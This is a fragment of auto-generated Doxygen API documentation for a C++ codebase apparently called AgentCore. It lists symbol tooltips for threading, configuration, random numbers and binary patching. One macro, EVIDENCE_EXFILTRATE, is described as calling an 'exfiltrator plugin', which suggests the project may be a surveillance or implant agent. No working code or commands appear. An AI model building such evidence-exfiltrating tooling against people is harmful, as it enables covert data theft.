<div class="ttc" id="aclassBdUtils_1_1CThread_html"><div class="ttname"><a href="classBdUtils_1_1CThread.html">BdUtils::CThread</a></div><div class="ttdoc">implements threading utilities, std based</div><div class="ttdef"><b>Definition:</b> <a href="CThread_8h_source.html#l00018">CThread.h:18</a></div></div>
<div class="ttc" id="aCAgentMsgUtils_8h_html"><div class="ttname"><a href="CAgentMsgUtils_8h.html">CAgentMsgUtils.h</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gabc3d9ed56f1b62fac4fdea93d2dd7646"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gabc3d9ed56f1b62fac4fdea93d2dd7646">EVIDENCE_EXFILTRATE</a></div><div class="ttdeci">#define EVIDENCE_EXFILTRATE</div><div class="ttdoc">to call the exfiltrator plugin to exfiltrate an evidence</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00062">IEvidence.h:61</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CConfigManager_html_a8224b013ac9257a74090a14b4f5c0e07"><div class="ttname"><a href="classAgentCorePrivate_1_1CConfigManager.html#a8224b013ac9257a74090a14b4f5c0e07">AgentCorePrivate::CConfigManager::instance</a></div><div class="ttdeci">static CConfigManager * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CConfigManager_8cpp_source.html#l00015">CConfigManager.cpp:15</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CRNG_html_afb9a4a337f5ffa03f51b169de99b31c7"><div class="ttname"><a href="classBdUtils_1_1CRNG.html#afb9a4a337f5ffa03f51b169de99b31c7">BdUtils::CRNG::nextRand</a></div><div class="ttdeci">uint32_t nextRand(int min=0, int max=UINT32_MAX, bool lock=true)</div><div class="ttdef"><b>Definition:</b> <a href="CRNG_8cpp_source.html#l00011">CRNG.cpp:11</a></div></div>
<div class="ttc" id="aCEvidenceManager_8h_html"><div class="ttname"><a href="CEvidenceManager_8h.html">CEvidenceManager.h</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga711f219c1a17aa2f9e18e994962d473e"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga711f219c1a17aa2f9e18e994962d473e">AgentCore::_EvidenceStartParams::outSize</a></div><div class="ttdeci">size_t outSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00031">IEvidence.h:31</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CBinaryPatch_html_aa60b302df302d4dea42c1014457bccba"><div class="ttname"><a href="classAgentCorePrivate_1_1CBinaryPatch.html#aa60b302df302d4dea42c1014457bccba">AgentCorePrivate::CBinaryPatch::agentId</a></div><div class="ttdeci">const char * agentId() override</div><div class="ttdef"><b>Definition:</b> <a href="CBinaryPatch_8cpp_source.html#l00076">CBinaryPatch.cpp:76</a></div></div>
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.18
</small></address>
</body>
</html>
